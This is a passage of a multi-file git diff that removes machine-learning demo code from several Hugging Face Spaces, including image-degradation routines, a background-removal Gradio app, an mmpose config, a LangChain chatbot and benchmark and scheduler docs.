image.shape[0])), - interpolation=random.choice([1, 2, 3])) - else: - k = fspecial('gaussian', 25, random.uniform(0.1, 0.6 * sf)) - k_shifted = shift_pixel(k, sf) - k_shifted = k_shifted / k_shifted.sum() # blur with shifted kernel - image = ndimage.filters.convolve(image, np.expand_dims(k_shifted, axis=2), mode='mirror') - image = image[0::sf, 0::sf, ...] # nearest downsampling - image = np.clip(image, 0.0, 1.0) - - elif i == 3: - # downsample3 - image = cv2.resize(image, (int(1 / sf * a), int(1 / sf * b)), interpolation=random.choice([1, 2, 3])) - image = np.clip(image, 0.0, 1.0) - - elif i == 4: - # add Gaussian noise - image = add_Gaussian_noise(image, noise_level1=2, noise_level2=25) - - elif i == 5: - # add JPEG noise - if random.random() < jpeg_prob: - image = add_JPEG_noise(image) - - # elif i == 6: - # # add processed camera sensor noise - # if random.random() < isp_prob and isp_model is not None: - # with torch.no_grad(): - # img, hq = isp_model.forward(img.copy(), hq) - - # add final JPEG compression noise - image = add_JPEG_noise(image) - image = util.single2uint(image) - example = {"image":image} - return example - - -# TODO incase there is a pickle error one needs to replace a += x with a = a + x in add_speckle_noise etc... -def degradation_bsrgan_plus(img, sf=4, shuffle_prob=0.5, use_sharp=True, lq_patchsize=64, isp_model=None): - """ - This is an extended degradation model by combining - the degradation models of BSRGAN and Real-ESRGAN - ---------- - img: HXWXC, [0, 1], its size should be large than (lq_patchsizexsf)x(lq_patchsizexsf) - sf: scale factor - use_shuffle: the degradation shuffle - use_sharp: sharpening the img - Returns - ------- - img: low-quality patch, size: lq_patchsizeXlq_patchsizeXC, range: [0, 1] - hq: corresponding high-quality patch, size: (lq_patchsizexsf)X(lq_patchsizexsf)XC, range: [0, 1] - """ - - h1, w1 = img.shape[:2] - img = img.copy()[:w1 - w1 % sf, :h1 - h1 % sf, ...] # mod crop - h, w = img.shape[:2] - - if h < lq_patchsize * sf or w < lq_patchsize * sf: - raise ValueError(f'img size ({h1}X{w1}) is too small!') - - if use_sharp: - img = add_sharpening(img) - hq = img.copy() - - if random.random() < shuffle_prob: - shuffle_order = random.sample(range(13), 13) - else: - shuffle_order = list(range(13)) - # local shuffle for noise, JPEG is always the last one - shuffle_order[2:6] = random.sample(shuffle_order[2:6], len(range(2, 6))) - shuffle_order[9:13] = random.sample(shuffle_order[9:13], len(range(9, 13))) - - poisson_prob, speckle_prob, isp_prob = 0.1, 0.1, 0.1 - - for i in shuffle_order: - if i == 0: - img = add_blur(img, sf=sf) - elif i == 1: - img = add_resize(img, sf=sf) - elif i == 2: - img = add_Gaussian_noise(img, noise_level1=2, noise_level2=25) - elif i == 3: - if random.random() < poisson_prob: - img = add_Poisson_noise(img) - elif i == 4: - if random.random() < speckle_prob: - img = add_speckle_noise(img) - elif i == 5: - if random.random() < isp_prob and isp_model is not None: - with torch.no_grad(): - img, hq = isp_model.forward(img.copy(), hq) - elif i == 6: - img = add_JPEG_noise(img) - elif i == 7: - img = add_blur(img, sf=sf) - elif i == 8: - img = add_resize(img, sf=sf) - elif i == 9: - img = add_Gaussian_noise(img, noise_level1=2, noise_level2=25) - elif i == 10: - if random.random() < poisson_prob: - img = add_Poisson_noise(img) - elif i == 11: - if random.random() < speckle_prob: - img = add_speckle_noise(img) - elif i == 12: - if random.random() < isp_prob and isp_model is not None: - with torch.no_grad(): - img, hq = isp_model.forward(img.copy(), hq) - else: - print('check the shuffle!') - - # resize to desired size - img = cv2.resize(img, (int(1 / sf * hq.shape[1]), int(1 / sf * hq.shape[0])), - interpolation=random.choice([1, 2, 3])) - - # add final JPEG compression noise - img = add_JPEG_noise(img) - - # random crop - img, hq = random_crop(img, hq, sf, lq_patchsize) - - return img, hq - - -if __name__ == '__main__': - print("hey") - img = util.imread_uint('utils/test.png', 3) - print(img) - img = util.uint2single(img) - print(img) - img = img[:448, :448] - h = img.shape[0] // 4 - print("resizing to", h) - sf = 4 - deg_fn = partial(degradation_bsrgan_variant, sf=sf) - for i in range(20): - print(i) - img_lq = deg_fn(img) - print(img_lq) - img_lq_bicubic = albumentations.SmallestMaxSize(max_size=h, interpolation=cv2.INTER_CUBIC)(image=img)["image"] - print(img_lq.shape) - print("bicubic", img_lq_bicubic.shape) - print(img_hq.shape) - lq_nearest = cv2.resize(util.single2uint(img_lq), (int(sf * img_lq.shape[1]), int(sf * img_lq.shape[0])), - interpolation=0) - lq_bicubic_nearest = cv2.resize(util.single2uint(img_lq_bicubic), (int(sf * img_lq.shape[1]), int(sf * img_lq.shape[0])), - interpolation=0) - img_concat = np.concatenate([lq_bicubic_nearest, lq_nearest, util.single2uint(img_hq)], axis=1) - util.imsave(img_concat, str(i) + '.png') - - diff --git a/spaces/AIlexDev/Einfach.Hintergrund/app.py b/spaces/AIlexDev/Einfach.Hintergrund/app.py deleted file mode 100644 index e4c1d36e51dc6974ea82a7a6bb43db35f8125743..0000000000000000000000000000000000000000 --- a/spaces/AIlexDev/Einfach.Hintergrund/app.py +++ /dev/null @@ -1,154 +0,0 @@ -import cv2 -import gradio as gr -import os -from PIL import Image -import numpy as np -import torch -from torch.autograd import Variable -from torchvision import transforms -import torch.nn.functional as F -import gdown -import matplotlib.pyplot as plt -import warnings -warnings.filterwarnings("ignore") - -os.system("git clone https://github.com/xuebinqin/DIS") -os.system("mv DIS/IS-Net/* .") - -# project imports -from data_loader_cache import normalize, im_reader, im_preprocess -from models import * - -#Helpers -device = 'cuda' if torch.cuda.is_available() else 'cpu' - -# Download official weights -if not os.path.exists("saved_models"): - os.mkdir("saved_models") - MODEL_PATH_URL = "https://drive.google.com/uc?id=1KyMpRjewZdyYfxHPYcd-ZbanIXtin0Sn" - gdown.download(MODEL_PATH_URL, "saved_models/isnet.pth", use_cookies=False) - -class GOSNormalize(object): - ''' - Normalize the Image using torch.transforms - ''' - def __init__(self, mean=[0.485,0.456,0.406], std=[0.229,0.224,0.225]): - self.mean = mean - self.std = std - - def __call__(self,image): - image = normalize(image,self.mean,self.std) - return image - - -transform = transforms.Compose([GOSNormalize([0.5,0.5,0.5],[1.0,1.0,1.0])]) - -def load_image(im_path, hypar): - im = im_reader(im_path) - im, im_shp = im_preprocess(im, hypar["cache_size"]) - im = torch.divide(im,255.0) - shape = torch.from_numpy(np.array(im_shp)) - return transform(im).unsqueeze(0), shape.unsqueeze(0) # make a batch of image, shape - - -def build_model(hypar,device): - net = hypar["model"]#GOSNETINC(3,1) - - # convert to half precision - if(hypar["model_digit"]=="half"): - net.half() - for layer in net.modules(): - if isinstance(layer, nn.BatchNorm2d): - layer.float() - - net.to(device) - - if(hypar["restore_model"]!=""): - net.load_state_dict(torch.load(hypar["model_path"]+"/"+hypar["restore_model"], map_location=device)) - net.to(device) - net.eval() - return net - - -def predict(net, inputs_val, shapes_val, hypar, device): - ''' - Given an Image, predict the mask - ''' - net.eval() - - if(hypar["model_digit"]=="full"): - inputs_val = inputs_val.type(torch.FloatTensor) - else: - inputs_val = inputs_val.type(torch.HalfTensor) - - - inputs_val_v = Variable(inputs_val, requires_grad=False).to(device) # wrap inputs in Variable - - ds_val = net(inputs_val_v)[0] # list of 6 results - - pred_val = ds_val[0][0,:,:,:] # B x 1 x H x W # we want the first one which is the most accurate prediction - - ## recover the prediction spatial size to the orignal image size - pred_val = torch.squeeze(F.upsample(torch.unsqueeze(pred_val,0),(shapes_val[0][0],shapes_val[0][1]),mode='bilinear')) - - ma = torch.max(pred_val) - mi = torch.min(pred_val) - pred_val = (pred_val-mi)/(ma-mi) # max = 1 - - if device == 'cuda': torch.cuda.empty_cache() - return (pred_val.detach().cpu().numpy()*255).astype(np.uint8) # it is the mask we need - -# Set Parameters -hypar = {} # paramters for inferencing - - -hypar["model_path"] ="./saved_models" ## load trained weights from this path -hypar["restore_model"] = "isnet.pth" ## name of the to-be-loaded weights -hypar["interm_sup"] = False ## indicate if activate intermediate feature supervision - -## choose floating point accuracy -- -hypar["model_digit"] = "full" ## indicates "half" or "full" accuracy of float number -hypar["seed"] = 0 - -hypar["cache_size"] = [1024, 1024] ## cached input spatial resolution, can be configured into different size - -## data augmentation parameters --- -hypar["input_size"] = [1024, 1024] ## mdoel input spatial size, usually use the same value hypar["cache_size"], which means we don't further resize the images -hypar["crop_size"] = [1024, 1024] ## random crop size from the input, it is usually set as smaller than hypar["cache_size"], e.g., [920,920] for data augmentation - -hypar["model"] = ISNetDIS() - - # Build Model -net = build_model(hypar, device) - - -def inference(image): - image_path = image - - image_tensor, orig_size = load_image(image_path, hypar) - mask = predict(net, image_tensor, orig_size, hypar, device) - - pil_mask = Image.fromarray(mask).convert('L') - im_rgb = Image.open(image).convert("RGB") - - im_rgba = im_rgb.copy() - im_rgba.putalpha(pil_mask) - - return [im_rgba, pil_mask] - - -title = "Akkurater Hintergrund Entferner" -description = "" -article = "
    visitor badge
    " - -interface = gr.Interface( - fn=inference, - inputs=gr.Image(type='filepath'), - outputs=["image", "image"], - examples=[['robot.png'], ['ship.png']], - title=title, - description=description, - article=article, - allow_flagging='never', - cache_examples=False, - ).queue(concurrency_count=1, api_open=True).launch(show_api=True, show_error=True) \ No newline at end of file diff --git a/spaces/ATang0729/Forecast4Muses/Model/Model6/Model6_1_ClothesKeyPoint/mmpose_1_x/configs/fashion_2d_keypoint/topdown_heatmap/deepfashion2/td_hm_res50_4xb32-120e_deepfashion2_sling_256x192.py b/spaces/ATang0729/Forecast4Muses/Model/Model6/Model6_1_ClothesKeyPoint/mmpose_1_x/configs/fashion_2d_keypoint/topdown_heatmap/deepfashion2/td_hm_res50_4xb32-120e_deepfashion2_sling_256x192.py deleted file mode 100644 index 188833c3b5603842ad864a75f3ff936687c0d8ca..0000000000000000000000000000000000000000 --- a/spaces/ATang0729/Forecast4Muses/Model/Model6/Model6_1_ClothesKeyPoint/mmpose_1_x/configs/fashion_2d_keypoint/topdown_heatmap/deepfashion2/td_hm_res50_4xb32-120e_deepfashion2_sling_256x192.py +++ /dev/null @@ -1,172 +0,0 @@ -_base_ = [ - '../../../_base_/default_runtime.py', - '../../../_base_/datasets/deepfashion2.py' -] - -default_hooks = dict(checkpoint=dict(save_best='PCK', rule='greater')) - -resume = False # 断点恢复 -load_from = None # 模型权重加载 -train_cfg = dict(by_epoch=True, max_epochs=120, val_interval=10) # 训练轮数,测试间隔 -param_scheduler = [ - dict( # warmup策略 - type='LinearLR', - begin=0, - end=500, - start_factor=0.001, - by_epoch=False), - dict( # scheduler - type='MultiStepLR', - begin=0, - end=120, - milestones=[80, 100], - gamma=0.1, - by_epoch=True) -] -optim_wrapper = dict(optimizer=dict(type='Adam', lr=0.0005)) # 优化器和学习率 -auto_scale_lr = dict(base_batch_size=512) # 根据batch_size自动缩放学习率 - -backend_args = dict(backend='local') # 数据加载后端设置,默认从本地硬盘加载 -dataset_type = 'DeepFashion2Dataset' # 数据集类名 DeepFashionDataset -data_mode = 'topdown' # 算法结构类型,用于指定标注信息加载策略 -data_root = 'data/deepfashion2/' # 数据存放路径 -# 定义数据编解码器,用于生成target和对pred进行解码,同时包含了输入图片和输出heatmap尺寸等信息 -codec = dict( - type='MSRAHeatmap', input_size=(192, 256), heatmap_size=(48, 64), sigma=2) - -train_pipeline = [ - dict(type='LoadImage'), - dict(type='GetBBoxCenterScale'), - dict(type='RandomFlip', direction='horizontal'), - dict( - type='RandomBBoxTransform', - shift_prob=0, - rotate_factor=60, - scale_factor=(0.75, 1.25)), - dict(type='TopdownAffine', input_size=codec['input_size']), - dict(type='GenerateTarget', encoder=codec), - dict(type='PackPoseInputs') -] -val_pipeline = [ # 测试时数据增强 - dict(type='LoadImage', backend_args=backend_args), # 加载图片 - dict(type='GetBBoxCenterScale'), # 根据bbox获取center和scale - dict(type='TopdownAffine', input_size=codec['input_size']), # 根据变换矩阵更新目标数据 - dict(type='PackPoseInputs') # 对target进行打包用于训练 -] -train_dataloader = dict( # 训练数据加载 - batch_size=32, # 批次大小 - num_workers=6, # 数据加载进程数 - persistent_workers=True, # 在不活跃时维持进程不终止,避免反复启动进程的开销 - sampler=dict(type='DefaultSampler', shuffle=True), # 采样策略,打乱数据 - dataset=dict( - type=dataset_type, # 数据集类名 - data_root=data_root, # 数据集路径 - data_mode=data_mode, # 算法类型 - ann_file='train/deepfashion2_sling.json', # 标注文件路径 - data_prefix=dict(img='train/image/'), # 图像路径 - pipeline=train_pipeline # 数据流水线 - )) -val_dataloader = dict( - batch_size=32, - num_workers=6, - persistent_workers=True, # 在不活跃时维持进程不终止,避免反复启动进程的开销 - drop_last=False, - sampler=dict(type='DefaultSampler', shuffle=False), # 采样策略,不进行打乱 - dataset=dict( - type=dataset_type, # 数据集类名 - data_root=data_root, # 数据集路径 - data_mode=data_mode, # 算法类型 - ann_file='validation/deepfashion2_sling.json', # 标注文件路径 - data_prefix=dict(img='validation/image/'), # 图像路径 - test_mode=True, # 测试模式开关 - pipeline=val_pipeline # 数据流水线 - )) -test_dataloader = val_dataloader # 默认情况下不区分验证集和测试集,用户根据需要来自行定义 - -channel_cfg = dict( - num_output_channels=294, - dataset_joints=294, - dataset_channel=[ - [ - 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, - 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, - 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, - 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, - 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, - 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, - 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, - 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, - 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, - 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, - 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, - 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, - 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, - 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, - 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, - 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, - 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, - 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, - 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, - 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, - 285, 286, 287, 288, 289, 290, 291, 292, 293 - ], - ], - inference_channel=[ - 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, - 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, - 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, - 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, - 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, - 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, - 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, - 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, - 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, - 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, - 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, - 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, - 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, - 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, - 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, - 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, - 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, - 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, - 276, 277, 278, 279, 280, 281, 282, 283, 284, 285, 286, 287, 288, 289, - 290, 291, 292, 293 - ]) - -model = dict( - type='TopdownPoseEstimator', # 模型结构决定了算法流程 - data_preprocessor=dict( # 数据归一化和通道顺序调整,作为模型的一部分 - type='PoseDataPreprocessor', - mean=[123.675, 116.28, 103.53], - std=[58.395, 57.12, 57.375], - bgr_to_rgb=True), - backbone=dict( - type='ResNet', - depth=50, - init_cfg=dict( - type='Pretrained', # 预训练参数,只加载backbone权重用于迁移学习 - checkpoint='torchvision://resnet50')), - head=dict( # 模型头部 - type='HeatmapHead', - in_channels=2048, - out_channels=channel_cfg['num_output_channels'], - # deconv_out_channels=None, - loss=dict(type='KeypointMSELoss', use_target_weight=True), # 损失函数 - decoder=codec), # 解码器,将heatmap解码成坐标值 - test_cfg=dict( - flip_test=True, # 开启测试时水平翻转集成 - flip_mode='heatmap', # 对heatmap进行翻转 - shift_heatmap=True, # 对翻转后的结果进行平移提高精度 - )) - -val_evaluator = [ - dict(type='PCKAccuracy', thr=0.2), - dict(type='AUC'), - dict(type='EPE'), -] -test_evaluator = val_evaluator # 默认情况下不区分验证集和测试集,用户根据需要来自行定义 - -visualizer = dict( - vis_backends=[dict(type='LocalVisBackend'), - dict(type='WandbVisBackend')]) diff --git a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/ui/click/Factory.d.ts b/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/ui/click/Factory.d.ts deleted file mode 100644 index 448177fa9e71a4fa977b2da4a9ded95e21d08a35..0000000000000000000000000000000000000000 --- a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/ui/click/Factory.d.ts +++ /dev/null @@ -1,7 +0,0 @@ -// import * as Phaser from 'phaser'; -import Click from "./Click"; - -export default function ( - gameObject: Phaser.GameObjects.GameObject, - config?: Click.IConfig -): Click; \ No newline at end of file diff --git a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/ui/dynamictext/Factory.d.ts b/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/ui/dynamictext/Factory.d.ts deleted file mode 100644 index 1187d805f4e244c96fd68e7640de62f787da5c2d..0000000000000000000000000000000000000000 --- a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/ui/dynamictext/Factory.d.ts +++ /dev/null @@ -1,5 +0,0 @@ -import DynamicText from "./DynamicText"; - -export default function ( - config?: DynamicText.IConfig -): DynamicText; \ No newline at end of file diff --git a/spaces/Ajaymekala/gradiolangchainChatBotOpenAI-1/app.py b/spaces/Ajaymekala/gradiolangchainChatBotOpenAI-1/app.py deleted file mode 100644 index a362dcc7d0ddd1eee86961f1bc3db6d894fbd3d5..0000000000000000000000000000000000000000 --- a/spaces/Ajaymekala/gradiolangchainChatBotOpenAI-1/app.py +++ /dev/null @@ -1,34 +0,0 @@ -import os -import gradio as gr -from langchain.chat_models import ChatOpenAI -from langchain import LLMChain, PromptTemplate -from langchain.memory import ConversationBufferMemory - -OPENAI_API_KEY=os.getenv('OPENAI_API_KEY') - -template = """You are a helpful assistant to answer all user queries. -{chat_history} -User: {user_message} -Chatbot:""" - -prompt = PromptTemplate( - input_variables=["chat_history", "user_message"], template=template -) - -memory = ConversationBufferMemory(memory_key="chat_history") - -llm_chain = LLMChain( - llm=ChatOpenAI(temperature='0.5', model_name="gpt-3.5-turbo"), - prompt=prompt, - verbose=True, - memory=memory, -) - -def get_text_response(user_message,history): - response = llm_chain.predict(user_message = user_message) - return response - -demo = gr.ChatInterface(get_text_response) - -if __name__ == "__main__": - demo.launch() #To create a public link, set `share=True` in `launch()`. To enable errors and logs, set `debug=True` in `launch()`. diff --git a/spaces/Alpaca233/SadTalker/src/face3d/models/arcface_torch/docs/speed_benchmark.md b/spaces/Alpaca233/SadTalker/src/face3d/models/arcface_torch/docs/speed_benchmark.md deleted file mode 100644 index 055aee0defe2c43a523ced48260242f0f99b7cea..0000000000000000000000000000000000000000 --- a/spaces/Alpaca233/SadTalker/src/face3d/models/arcface_torch/docs/speed_benchmark.md +++ /dev/null @@ -1,93 +0,0 @@ -## Test Training Speed - -- Test Commands - -You need to use the following two commands to test the Partial FC training performance. -The number of identites is **3 millions** (synthetic data), turn mixed precision training on, backbone is resnet50, -batch size is 1024. -```shell -# Model Parallel -python -m torch.distributed.launch --nproc_per_node=8 --nnodes=1 --node_rank=0 --master_addr="127.0.0.1" --master_port=1234 train.py configs/3millions -# Partial FC 0.1 -python -m torch.distributed.launch --nproc_per_node=8 --nnodes=1 --node_rank=0 --master_addr="127.0.0.1" --master_port=1234 train.py configs/3millions_pfc -``` - -- GPU Memory - -``` -# (Model Parallel) gpustat -i -[0] Tesla V100-SXM2-32GB | 64'C, 94 % | 30338 / 32510 MB -[1] Tesla V100-SXM2-32GB | 60'C, 99 % | 28876 / 32510 MB -[2] Tesla V100-SXM2-32GB | 60'C, 99 % | 28872 / 32510 MB -[3] Tesla V100-SXM2-32GB | 69'C, 99 % | 28872 / 32510 MB -[4] Tesla V100-SXM2-32GB | 66'C, 99 % | 28888 / 32510 MB -[5] Tesla V100-SXM2-32GB | 60'C, 99 % | 28932 / 32510 MB -[6] Tesla V100-SXM2-32GB | 68'C, 100 % | 28916 / 32510 MB -[7] Tesla V100-SXM2-32GB | 65'C, 99 % | 28860 / 32510 MB - -# (Partial FC 0.1) gpustat -i -[0] Tesla V100-SXM2-32GB | 60'C, 95 % | 10488 / 32510 MB │······················· -[1] Tesla V100-SXM2-32GB | 60'C, 97 % | 10344 / 32510 MB │······················· -[2] Tesla V100-SXM2-32GB | 61'C, 95 % | 10340 / 32510 MB │······················· -[3] Tesla V100-SXM2-32GB | 66'C, 95 % | 10340 / 32510 MB │······················· -[4] Tesla V100-SXM2-32GB | 65'C, 94 % | 10356 / 32510 MB │······················· -[5] Tesla V100-SXM2-32GB | 61'C, 95 % | 10400 / 32510 MB │······················· -[6] Tesla V100-SXM2-32GB | 68'C, 96 % | 10384 / 32510 MB │······················· -[7] Tesla V100-SXM2-32GB | 64'C, 95 % | 10328 / 32510 MB │······················· -``` - -- Training Speed - -```python -# (Model Parallel) trainging.log -Training: Speed 2271.33 samples/sec Loss 1.1624 LearningRate 0.2000 Epoch: 0 Global Step: 100 -Training: Speed 2269.94 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 150 -Training: Speed 2272.67 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 200 -Training: Speed 2266.55 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 250 -Training: Speed 2272.54 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 300 - -# (Partial FC 0.1) trainging.log -Training: Speed 5299.56 samples/sec Loss 1.0965 LearningRate 0.2000 Epoch: 0 Global Step: 100 -Training: Speed 5296.37 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 150 -Training: Speed 5304.37 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 200 -Training: Speed 5274.43 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 250 -Training: Speed 5300.10 samples/sec Loss 0.0000 LearningRate 0.2000 Epoch: 0 Global Step: 300 -``` - -In this test case, Partial FC 0.1 only use1 1/3 of the GPU memory of the model parallel, -and the training speed is 2.5 times faster than the model parallel. - - -## Speed Benchmark - -1. Training speed of different parallel methods (samples/second), Tesla V100 32GB * 8. (Larger is better) - -| Number of Identities in Dataset | Data Parallel | Model Parallel | Partial FC 0.1 | -| :--- | :--- | :--- | :--- | -|125000 | 4681 | 4824 | 5004 | -|250000 | 4047 | 4521 | 4976 | -|500000 | 3087 | 4013 | 4900 | -|1000000 | 2090 | 3449 | 4803 | -|1400000 | 1672 | 3043 | 4738 | -|2000000 | - | 2593 | 4626 | -|4000000 | - | 1748 | 4208 | -|5500000 | - | 1389 | 3975 | -|8000000 | - | - | 3565 | -|16000000 | - | - | 2679 | -|29000000 | - | - | 1855 | - -2. GPU memory cost of different parallel methods (GB per GPU), Tesla V100 32GB * 8. (Smaller is better) - -| Number of Identities in Dataset | Data Parallel | Model Parallel | Partial FC 0.1 | -| :--- | :--- | :--- | :--- | -|125000 | 7358 | 5306 | 4868 | -|250000 | 9940 | 5826 | 5004 | -|500000 | 14220 | 7114 | 5202 | -|1000000 | 23708 | 9966 | 5620 | -|1400000 | 32252 | 11178 | 6056 | -|2000000 | - | 13978 | 6472 | -|4000000 | - | 23238 | 8284 | -|5500000 | - | 32188 | 9854 | -|8000000 | - | - | 12310 | -|16000000 | - | - | 19950 | -|29000000 | - | - | 32324 | diff --git a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/docs/source/en/api/schedulers/ddim_inverse.md b/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/docs/source/en/api/schedulers/ddim_inverse.md deleted file mode 100644 index 5096a3cee283d7a59eeedc48b1dea5080c46aa21..0000000000000000000000000000000000000000 --- a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/docs/source/en/api/schedulers/ddim_inverse.md +++ /dev/null @@ -1,21 +0,0 @@ - - -# Inverse Denoising Diffusion Implicit Models (DDIMInverse) - -## Overview - -This scheduler is the inverted scheduler of [Denoising Diffusion Implicit Models](https://arxiv.org/abs/2010.02502) (DDIM) by Jiaming Song, Chenlin Meng and Stefano Ermon. -The implementation is mostly based on the DDIM inversion definition of [Null-text Inversion for Editing Real Images using Guided Diffusion Models](https://arxiv.org/pdf/2211.09794.pdf) - -## DDIMInverseScheduler -[[autodoc]] DDIMInverseScheduler diff --git a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/utils/check_copies.py b/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/utils/check_copies.py deleted file mode 100644 index 0ba573bb920eeb6787487f043db3c2896b656b92..0000000000000000000000000000000000000000 --- a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/utils/check_copies.py +++ /dev/null @@ -1,213 +0,0 @@ -# coding=utf-8 -# Copyright 2023 The HuggingFace Inc. team. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -import argparse -import glob -import importlib.util -import os -import re - -import black -from doc_builder.style_doc import style_docstrings_in_code - - -# All paths are set with the intent you should run this script from the root of the repo with the command -# python utils/check_copies.py -DIFFUSERS_PATH = "src/diffusers" -REPO_PATH = "." - - -# This is to make sure the diffusers module imported is the one in the repo. -spec = importlib.util.spec_from_file_location( - "diffusers", - os.path.join(DIFFUSERS_PATH, "__init__.py"), - submodule_search_locations=[DIFFUSERS_PATH], -) -diffusers_module = spec.loader.load_module() - - -def _should_continue(line, indent): - return line.startswith(indent) or len(line) <= 1 or re.search(r"^\s*\)(\s*->.*:|:)\s*$", line) is not None - - -def find_code_in_diffusers(object_name): - """Find and return the code source code of `object_name`.""" - parts = object_name.split(".") - i = 0 - - # First let's find the module where our object lives. - module = parts[i] - while i < len(parts) and not os.path.isfile(os.path.join(DIFFUSERS_PATH, f"{module}.py")): - i += 1 - if i < len(parts): - module = os.path.join(module, parts[i]) - if i >= len(parts): - raise ValueError(f"`object_name` should begin with the name of a module of diffusers but got {object_name}.") - - with open(os.path.join(DIFFUSERS_PATH, f"{module}.py"), "r", encoding="utf-8", newline="\n") as f: - lines = f.readlines() - - # Now let's find the class / func in the code! - indent = "" - line_index = 0 - for name in parts[i + 1 :]: - while ( - line_index < len(lines) and re.search(rf"^{indent}(class|def)\s+{name}(\(|\:)", lines[line_index]) is None - ): - line_index += 1 - indent += " " - line_index += 1 - - if line_index >= len(lines): - raise ValueError(f" {object_name} does not match any function or class in {module}.") - - # We found the beginning of the class / func, now let's find the end (when the indent diminishes). - start_index = line_index - while line_index < len(lines) and _should_continue(lines[line_index], indent): - line_index += 1 - # Clean up empty lines at the end (if any). - while len(lines[line_index - 1]) <= 1: - line_index -= 1 - - code_lines = lines[start_index:line_index] - return "".join(code_lines) - - -_re_copy_warning = re.compile(r"^(\s*)#\s*Copied from\s+diffusers\.(\S+\.\S+)\s*($|\S.*$)") -_re_replace_pattern = re.compile(r"^\s*(\S+)->(\S+)(\s+.*|$)") -_re_fill_pattern = re.compile(r"]*>") - - -def get_indent(code): - lines = code.split("\n") - idx = 0 - while idx < len(lines) and len(lines[idx]) == 0: - idx += 1 - if idx < len(lines): - return re.search(r"^(\s*)\S", lines[idx]).groups()[0] - return "" - - -def blackify(code): - """ - Applies the black part of our `make style` command to `code`. - """ - has_indent = len(get_indent(code)) > 0 - if has_indent: - code = f"class Bla:\n{code}" - mode = black.Mode(target_versions={black.TargetVersion.PY37}, line_length=119, preview=True) - result = black.format_str(code, mode=mode) - result, _ = style_docstrings_in_code(result) - return result[len("class Bla:\n") :] if has_indent else result - - -def is_copy_consistent(filename, overwrite=False): - """ - Check 